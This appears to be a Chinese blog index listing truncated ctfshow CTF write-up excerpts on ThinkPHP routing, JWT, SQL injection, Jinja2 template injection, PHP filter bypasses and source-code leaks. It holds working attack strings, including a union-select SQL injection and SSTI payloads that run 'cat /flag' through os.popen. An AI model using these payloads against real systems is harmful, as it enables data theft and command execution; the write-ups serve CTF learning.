Sentiment的博客

web569主要就是考察了一个url解析模式http://localhost/index.php/模块/控制器/操作/参数/值payload:/index.php/Admin/Login/ctfshowLoginweb570Common/Conf/config.php,发现可利用点，一个闭包路由'ctfshow/:f/:a' =>function($f,$a){ call_user_func($f, $a); }传参发现也能正常执行/index.php/ctfsho

web301

web254

基础知识jwt是由三部分构成的，第一部分是头部（header），第二部分是载荷（payload），第三部分为签证（signature）头部头部声明了类型和加密方法，如下{ 'typ': 'JWT', 'alg': 'HS256'}然后将头部进行base64加密后去掉=号，构成第一部分ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9载荷和头部结构类似，但存放的是数据签证jwt的第三部分是一个签证信息，这个签证信息由三部分组成：

web351

无过滤注入web171查询语句$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";单引号闭合,未做任何过滤payload:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ /

web361没做任何的过滤,任意payload即可payload:?name={{url_for.__globals__['os']['popen']("cat /flag").read()}web362提示做了过滤但上题的payload仍然能打通web363过滤了引号"可以用request.args.a绕过例：{{()[request.args.a][request.args.b][-1][request.args.c]()}}?a=__class__&b=__mro__&a

web89intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if

web1F12直接出web2禁用右键,F12还是可以看到源码web3这次后台没有源码了,火狐看响应头发现flagweb4题目提示robots协议,访问robots.txt访问flagishere.txtweb5题目提示phps源码泄露,访问index.phps下载源码web6题目提示解压源码到当前目录,猜测为www.zip访问下载解压，提示fl000g.txt，访问得到flagweb7版本控制器，不是git泄露就是svn泄露 此题通过访问/.git/获得flag